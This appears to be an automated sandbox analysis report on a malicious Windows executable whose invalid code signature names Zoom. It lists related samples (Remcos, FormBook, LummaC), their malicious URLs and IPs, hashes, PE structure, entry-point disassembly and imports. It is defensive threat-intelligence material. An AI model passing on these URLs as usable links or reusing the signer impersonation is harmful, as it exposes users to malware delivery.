              • 660256cm.nyashka.top/javascriptsecurelowWindows.php
              RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
              • tny.wtf/dGa
              DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/
              Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
              • tny.wtf/
              AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/sA
              RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
              • tny.wtf/
              RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
              • tny.wtf/
              #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/4Gs
              Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
              • downloaddining2.com/h9fmdW6/index.php

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSQUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 188.114.96.3
              CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
              • 188.114.96.3
              FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 104.26.2.16
              8SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
              • 188.114.97.3
              e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 104.26.2.16
              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
              • 188.114.96.3
              https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
              • 172.67.37.149
              NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
              • 172.67.177.136
              NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
              • 172.67.177.136
              https://forms.office.com/r/Rv9K1pC66nGet hashmaliciousUnknownBrowse
              • 104.17.112.233

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              a0e9f5d64349fb13191bc781f81f42e1FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 188.114.97.3
              e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
              • 188.114.97.3
              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
              • 188.114.97.3
              NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Launcher.exeGet hashmaliciousLummaC StealerBrowse
              • 188.114.97.3
              github_softwares_v1.18.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
              • 188.114.97.3
              1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
              • 188.114.97.3
              file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
              • 188.114.97.3
              pn24_065.docx.docGet hashmaliciousUnknownBrowse
              • 188.114.97.3

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.977847102897721
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:rwsNDpQSKZ.exe
              File size:2'362'184 bytes
              MD5:35e69f7b1869d8e9cf4270b6ec33ef41
              SHA1:0c89e58442108b0f503b3cc586bccc0ec9d6d9e6
              SHA256:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd
              SHA512:0cc2caee398e9ef4467a7b5957ad39f2427e2f3b175f77aad785b33e72bca49c6904eafd2fabb77779497db7d9bd2f612d8fba0ac0f210b39276632d3c317c31
              SSDEEP:24576:19LbNaGbnNFKq7DZwoGdcoWTV/7NpBnTchla:1RR7N0kD2owcoWTV/7NpBnTchl
              TLSH:3FB57E607E52CC1DD7667135BC6ABB355A6B2AE07B7C11F3C2CD26A61B646C00F39B02
              File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........E...$...$...$...L...$...L...$...Kx..$...Q...$...Q...$...Q...$...L...$...L...$...L...$...$...%...Q...$...Q...$...Qz..$...$...$.

              File Icon

              Icon Hash:e082c4e4ae8c82e8

              Static PE Info

              General

              Entrypoint:0x494ca0
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x669E1AC1 [Mon Jul 22 08:39:29 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:0f27251cd0ae6d35bba6ab719b508e1e

              Authenticode Signature

              Signature Valid:false
              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1, O="DigiCert, Inc.", C=US
              Signature Validation Error:The digital signature of the object did not verify
              Error Number:-2146869232
              Not Before, Not After
              • 27/06/2024 01:00:00 16/10/2024 00:59:59
              Subject Chain
              • CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
              Version:3
              Thumbprint MD5:6FECD6159C33F340CBD846FAE083CAA1
              Thumbprint SHA-1:326AFFEA74A7E28B42A87C80B8904BD786E1BEF7
              Thumbprint SHA-256:CFBFF4F5B70EC76E43325A587B396AA441FAAB6A91215309C36A4E81DAE11490
              Serial:039C124448061E99E69CD95D57C807A6

              Entrypoint Preview

              Instruction
              call 00007F72994B0372h
              jmp 00007F72994AF48Dh
              push ebp
              mov ebp, esp
              push dword ptr [ebp+08h]
              call 00007F72994AF0DEh
              pop ecx
              pop ebp
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              call 00007F72994AF647h
              push 00000000h
              call 00007F72994AF1ABh
              pop ecx
              test al, al
              je 00007F72994AF630h
              push 00494D70h
              call 00007F72994AF329h
              pop ecx
              xor eax, eax
              ret
              push 00000007h
              call 00007F72994B00D0h
              int3
              push esi
              push edi
              push 00000FA0h
              push 005AECA8h
              call dword ptr [004CD30Ch]
              push 004F0860h
              call dword ptr [004CD0ECh]
              mov esi, eax
              test esi, esi
              jne 00007F72994AF633h
              push 004ED208h
              call dword ptr [004CD0ECh]
              mov esi, eax
              test esi, esi
              je 00007F72994AF668h
              push 004D3F34h
              push esi
              call dword ptr [004CD0E8h]
              push 004D3F18h
              push esi
              mov edi, eax
              call dword ptr [004CD0E8h]
              test edi, edi
              je 00007F72994AF634h
              test eax, eax
              je 00007F72994AF630h
              mov dword ptr [005AECC0h], edi
              mov dword ptr [005AECC4h], eax
              pop edi
              pop esi
              ret
              xor eax, eax
              push eax
              push eax
              push 00000001h
              push eax
              call dword ptr [004CD1FCh]
              mov dword ptr [005AECA4h], eax
              test eax, eax
              jne 00007F72994AF609h
              push 00000007h
              call 00007F72994B004Eh

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x1104500x8c1c0.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x19c6100x118.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b10000x2ab58.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x23ac000x5f48
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1dc0000x12206.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0xf32a00x70.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0xf34000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf33100x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0xcd0000x460.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xcb40c0xcb600119c6706551fcad3f7f9fc2a5f2d2003False0.4501130819760295data6.583925038489715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0xcd0000xd0fe80xd1000a7afe32818ced10c5534701d0daa0334False0.2295027007326555data5.854279956818834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x19e0000x11f700x10800ba33cd8866252efdfda4432590dfb2a3False0.14055101799242425DOS executable (block device driver)4.591426088798704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .PROPSEC0x1b00000xe100x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x1b10000x2ab580x2ac00b6db9496e25f165677273b209b29582aFalse0.37892909356725146data5.996038029493702IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x1dc0000x61e000x61e0059fae4842e955a0fca65dc50f5fac7f5False0.8687714519476373data7.920012596506672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x1b15d00x528Device independent bitmap graphic, 16 x 32 x 32, image size 1280EnglishUnited States0.4401515151515151
              RT_ICON0x1b1af80xb68Device independent bitmap graphic, 24 x 48 x 32, image size 2880EnglishUnited States0.29486301369863016
              RT_ICON0x1b26600x1428Device independent bitmap graphic, 32 x 64 x 32, image size 5120EnglishUnited States0.23507751937984497
              RT_ICON0x1b3a880x2d28Device independent bitmap graphic, 48 x 96 x 32, image size 11520EnglishUnited States0.17439446366782008
              RT_ICON0x1b67b00x5028Device independent bitmap graphic, 64 x 128 x 32, image size 20480EnglishUnited States0.12339181286549708
              RT_ICON0x1bb7d80x14028Device independent bitmap graphic, 128 x 256 x 32, image size 81920EnglishUnited States0.0954123962908736
              RT_ICON0x1cf8000xc16dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005250721974273
              RT_GROUP_ICON0x1db9700x68dataEnglishUnited States0.7403846153846154
              RT_VERSION0x1b12700x35cdataEnglishUnited States0.4313953488372093
              RT_MANIFEST0x1db9d80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

              Imports

              DLLImport
              KERNEL32.dllReadFile, FindFirstFileW, HeapFree, SetLastError, GetFullPathNameW, FindNextFileW, WriteFile, RemoveDirectoryW, SetFilePointer, SetEndOfFile, GetTempPathW, FindClose, CreateFileW, GetFileAttributesW, MultiByteToWideChar, DeleteFileW, HeapAlloc, GetCurrentDirectoryW, SetCurrentDirectoryW, MoveFileExW, GetFileSize, GetProcessHeap, WideCharToMultiByte, SystemTimeToTzSpecificLocalTime, GetTempFileNameW, MoveFileW, FlushFileBuffers, TryEnterCriticalSection, SuspendThread, ResumeThread, SetEvent, ResetEvent, SwitchToThread, GetDynamicTimeZoneInformation, GetTimeZoneInformation, LocalFileTimeToFileTime, OutputDebugStringW, QueryPerformanceFrequency, FileTimeToLocalFileTime, GetProcAddress, GetModuleHandleW, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetModuleHandleA, CancelIo, GetCurrentProcess, CreateNamedPipeW, GetQueuedCompletionStatus, PostQueuedCompletionStatus, CreateIoCompletionPort, ConnectNamedPipe, OutputDebugStringA, CreateProcessW, CreateDirectoryW, TlsSetValue, TlsAlloc, TlsGetValue, TlsFree, GlobalMemoryStatusEx, FreeLibrary, LoadLibraryW, CreateMutexW, ReleaseMutex, OpenProcess, GetTickCount, GetFileTime, VirtualProtect, ReleaseSemaphore, TerminateProcess, WaitForMultipleObjects, FileTimeToSystemTime, Process32NextW, CreateFileA, Process32FirstW, GetWindowsDirectoryW, VerSetConditionMask, CreateSemaphoreW, FlushInstructionCache, VerifyVersionInfoW, CreateDirectoryA, SetDllDirectoryW, VirtualQuery, LoadLibraryExW, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, IsWow64Process, GlobalAlloc, GlobalFree, FindFirstFileExW, LoadLibraryExA, VirtualFree, InterlockedPopEntrySList, GetLocaleInfoW, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, SetConsoleCtrlHandler, ExitProcess, CloseHandle, CreateThread, SystemTimeToFileTime, RtlCaptureStackBackTrace, PulseEvent, TerminateThread, Sleep, CreateEventW, WaitForSingleObject, FormatMessageA, GetCurrentProcessId, DeleteCriticalSection, LocalFree, DecodePointer, RaiseException, GetLastError, CompareStringA, FormatMessageW, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, VirtualAlloc, GetExitCodeProcess, IsBadReadPtr, K32GetModuleBaseNameW, GetEnvironmentVariableW, MapViewOfFile, CreateFileMappingW, GetSystemInfo, UnmapViewOfFile, OpenThread, HeapDestroy, FindResourceW, LoadResource, FindResourceExW, LockResource, SizeofResource, WriteConsoleW, FreeEnvironmentStringsW, GetConsoleMode, GetConsoleCP, PeekNamedPipe, GetFileType, GetFileInformationByHandle, GetDriveTypeW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, HeapSize, ReadConsoleW, SetStdHandle, HeapReAlloc, SetFilePointerEx, GetFileSizeEx, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, LCMapStringW, GetTimeFormatW, GetDateFormatW, CompareStringW, CreateToolhelp32Snapshot, GetCommandLineW, GetCommandLineA, GetStdHandle, GetStringTypeW, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WaitForSingleObjectEx, EncodePointer, LCMapStringEx, GetCPInfo, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, InitializeSListHead, RtlUnwind, InterlockedPushEntrySList, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, SetEnvironmentVariableW
              USER32.dllUnregisterClassW, LoadStringA, GetMessageW, SetTimer, TranslateMessage, LoadStringW, DispatchMessageW, PostThreadMessageW, SendMessageTimeoutW, KillTimer, GetUserObjectInformationA, GetProcessWindowStation, GetClassInfoExW, SetWindowLongW, CharUpperW, LoadCursorW, MsgWaitForMultipleObjectsEx, PeekMessageW, IsWindow, RegisterClassExW, CreateWindowExW, IsWindowVisible, DestroyWindow, EnumThreadWindows, CallWindowProcW, DefWindowProcW, GetWindowLongW, MessageBoxW, wsprintfW
              ADVAPI32.dllRevertToSelf, SetTokenInformation, AllocateAndInitializeSid, CreateWellKnownSid, ImpersonateLoggedOnUser, CreateRestrictedToken, FreeSid, DuplicateTokenEx, OpenProcessToken, ConvertSidToStringSidW, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetTokenInformation, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, RegGetValueW
              SHELL32.dllSHGetSpecialFolderPathA, SHGetKnownFolderPath, SHGetFolderPathW, SHGetSpecialFolderPathW
              ole32.dllCoCreateInstance, CoInitializeEx, CoTaskMemFree, CoCreateGuid, StringFromCLSID, CLSIDFromString
              OLEAUT32.dllVariantChangeType, VariantClear
              SHLWAPI.dllPathFileExistsW, PathIsRelativeW, PathAppendW
              MAPI32.dll
              PSAPI.DLLGetModuleFileNameExW, GetModuleInformation, EnumProcessModules
              WINMM.dlltimeGetTime, timeBeginPeriod, timeEndPeriod
              WINTRUST.dllWTHelperGetProvSignerFromChain, WTHelperProvDataFromStateData, WTHelperGetProvCertFromChain, WinVerifyTrust
              CRYPT32.dllCertGetNameStringW
              RPCRT4.dllRpcStringFreeA, UuidToStringA

              Exports

              NameOrdinalAddress
              ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z10x40c180
              ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z20x406350
              ??0?$CStringT@D@Cmm@@QAE@ABV01@I@Z30x406290
              ??0?$CStringT@D@Cmm@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z40x406320
              ??0?$CStringT@D@Cmm@@QAE@PBD@Z50x4062d0
              ??0?$CStringT@D@Cmm@@QAE@PBDI@Z60x406260
              ??0?$CStringT@D@Cmm@@QAE@V?$CRangeT@PBD@1@@Z70x406210
              ??0?$CStringT@D@Cmm@@QAE@XZ80x406380
              ??0?$CStringT@_W@Cmm@@QAE@$$QAV01@@Z90x40c1b0
              ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z100x404510
              ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z110x404450
              ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z120x4044e0
              ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z130x404490
              ??0?$CStringT@_W@Cmm@@QAE@PB_WI@Z140x404420
              ??0?$CStringT@_W@Cmm@@QAE@V?$CRangeT@PB_W@1@@Z150x4043d0
              ??0?$CStringT@_W@Cmm@@QAE@XZ160x404540
              ??0?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@QAE@PBDH0000000000@Z170x42dd00
              ??0?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@QAE@PBDH0000000000@Z180x42c470
              ??0?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@QAE@PBDH0000000000@Z190x42e880
              ??0?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAE@PBDH0000000000@Z200x428c30
              ??0?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000000@Z210x429340
              ??0?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@QAE@PBDH00000000000@Z220x42dbf0
              ??0?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@QAE@PBDH00000000000@Z230x42e7a0
              ??0?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAE@PBDH00000000000@Z240x428b50
              ??0?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@QAE@PBDH000000000000@Z250x42dad0
              ??0?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@QAE@PBDH000000000000@Z260x42e6c0
              ??0?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@QAE@PBDH000000000000@Z270x428a70
              ??0?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@QAE@PBDH0000000000000@Z280x42d9b0
              ??0?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@QAE@PBDH0000000000000@Z290x42e5e0
              ??0?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000000000@Z300x42d890
              ??0?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@QAE@PBDH00000000000000@Z310x42e500
              ??0?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@QAE@PBDH000000000000000@Z320x42d770
              ??0?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@QAE@PBDH000000000000000@Z330x42e420
              ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z340x4366a0
              ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z350x40d540
              ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z360x40d270
              ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z370x40d860
              ??0?$CmmMessageTemplate_1@_J@Archive@Cmm@@QAE@PBDH0@Z380x4398b0
              ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z390x43a460
              ??0?$CmmMessageTemplate_2@HI@Archive@Cmm@@QAE@PBDH00@Z400x43f220
              ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z410x43aee0
              ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z420x437690
              ??0?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAE@PBDH00@Z430x4365e0
              ??0?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAE@PBDH00@Z440x4389d0
              ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z450x435120
              ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z460x435b10
              ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z470x40d600
              ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z480x43cdd0
              ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z490x434f00
              ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z500x438e10
              ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@@Archive@Cmm@@QAE@PBDH00@Z510x444140
              ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@_J@Archive@Cmm@@QAE@PBDH00@Z520x43d9e0
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z530x43b360
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z540x435ef0
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z550x435590
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V?$CStringT@D@2@@Archive@Cmm@@QAE@PBDH00@Z560x4436f0
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_J@Archive@Cmm@@QAE@PBDH00@Z570x4362a0
              ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAE@PBDH00@Z580x40d960
              ??0?$CmmMessageTemplate_2@_JH@Archive@Cmm@@QAE@PBDH00@Z590x4421f0
              ??0?$CmmMessageTemplate_2@_JV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z600x43f610
              ??0?$CmmMessageTemplate_2@_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z610x4397c0
              ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z620x43a780
              ??0?$CmmMessageTemplate_3@HHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z630x43abc0
              ??0?$CmmMessageTemplate_3@HIH@Archive@Cmm@@QAE@PBDH000@Z640x440180
              ??0?$CmmMessageTemplate_3@HII@Archive@Cmm@@QAE@PBDH000@Z650x4406a0
              ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z660x43e2d0
              ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z670x43ae20
              ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z680x43c980
              ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z690x442e60
              ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z700x4456a0
              ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z710x4375b0
              ??0?$CmmMessageTemplate_3@H_JV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z720x4364e0
              ??0?$CmmMessageTemplate_3@IHI@Archive@Cmm@@QAE@PBDH000@Z730x440460
              ??0?$CmmMessageTemplate_3@IHV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z740x4388d0
              ??0?$CmmMessageTemplate_3@IIH@Archive@Cmm@@QAE@PBDH000@Z750x43d280
              ??0?$CmmMessageTemplate_3@III@Archive@Cmm@@QAE@PBDH000@Z760x436ee0
              ??0?$CmmMessageTemplate_3@IIV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH000@Z770x43bf00
              ??0?$CmmMessageTemplate_3@IV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z780x435a10
              ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z790x445fe0
              ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH000@Z800x4391b0
              ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z810x437f30
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HH@Archive@Cmm@@QAE@PBDH000@Z820x43cd10
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH000@Z830x43d020
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@H_J@Archive@Cmm@@QAE@PBDH000@Z840x440de0
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z850x43ea00
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z860x43bc00
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z870x43c490
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@I@Archive@Cmm@@QAE@PBDH000@Z880x43fe70
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z890x438ce0
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@@Archive@Cmm@@QAE@PBDH000@Z900x444030
              ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@_JV12@@Archive@Cmm@@QAE@PBDH000@Z910x43d8e0
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAE@PBDH000@Z920x442b00
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HI@Archive@Cmm@@QAE@PBDH000@Z930x441ba0
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH000@Z940x444620
              ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HV?$CStringT@D@2@@Archive@Cmm@@QAE@PBDH000@Z950x444a00
